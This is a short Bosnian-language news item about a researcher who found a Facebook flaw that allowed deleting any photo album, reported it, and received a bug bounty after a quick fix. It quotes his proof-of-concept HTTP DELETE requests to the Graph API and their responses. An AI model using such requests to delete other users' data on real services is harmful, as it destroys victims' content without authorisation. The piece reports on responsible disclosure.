Stručnjak za bezbijednost po imenu Laxman Muthiyah, otkrtio je nedavno ozbiljan propust društvenog giganta facebook-a, pomoću kojeg se mogao u potpunosti obrisati bilo koji foto-album (pa čak i album Marka Zuckerberg-a), i to sa samo 4 linije koda.
[pullquote]
Request :-
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=
Response :-
true
Album(518171421550249) got deleted 😀 so whats the next step? Took victim’s album id and tried to delete it. I was very curious to see the result.
Request :-
DELETE /518171421550249 HTTP/1.1
Host : graph.facebook.com
Content-Length: 245
access_token=
Response :-
true
[/pullquote]Laxman je pokušao iskoristiti propust preko mobilne verzije facebooka i odmah uspio. Nakon što je prijavio propust facebook administraciji, koja je propust ispravila za samo 2 sata, Laxman je dobio nagradu od 12.500$. Mnogi stručnjaci tvrde da je propust koji je Laxman pronašao bio “smtronosno oružje”, jer je mogao napraviti haos na društvenoj mreži. Mogao je uraditi bilo šta s tim, prodati nekome ili postati poznat kao “čovjek koji je napravio haos na facebook-u”. Međutim Laxman je odlučio uraditi pravu stvar i odmah prijaviti propust.
(brckodanas.com)